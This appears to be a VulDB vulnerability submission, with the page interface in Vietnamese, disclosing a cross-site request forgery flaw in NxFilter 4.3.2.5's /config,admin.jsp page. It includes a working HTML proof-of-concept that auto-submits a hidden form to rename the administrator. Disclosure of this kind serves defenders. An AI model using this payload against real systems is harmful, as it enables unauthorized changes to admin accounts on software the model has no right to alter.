Gửi #249432: Nxfilter NxFilter 4.3.2.5 4.3.2.5 CSRFthông tin

tiêu đềNxfilter NxFilter 4.3.2.5 4.3.2.5 CSRF
Mô tảA CSRF is present in https://APP.COM/config,admin.jsp where a malicious user change the username of the administrator through a CSRF. If the Admin clicks on the link, his name can be changed by the name the hacker want. Exploit in HTML: <!DOCTYPE html> <html lang="en"> <head> </head> <body> <form id="configForm" action="https://192.168.0.134/config,admin.jsp" method="POST"> <!-- Campos do formulário --> <input type="hidden" name="actionFlag" value="update"> <input type="text" name="admin_name" value="hacker" style="display: none;"> <!--name here--> <!-- Botão para enviar o formulário --> <button type="submit">Enviar Requisição</button> </form> </body> <script> document.getElementById('configForm').submit(); </script> </html>
Nguồn⚠️ https://APP.COM/config,admin.jsp
Người dùng
 0xgordo (UID 50709)
Đệ trình08/12/2023 17:26 (cách đây 3 những năm)
Kiểm duyệt17/12/2023 09:25 (9 days later)
Trạng tháiđược chấp nhận
Mục VulDB248266 [Jahastech NxFilter 4.3.2.5 /config,admin.jsp admin_name Giả mạo yêu cầu liên trang]
điểm17

Want to stay up to date on a daily basis?

Enable the mail alert feature now!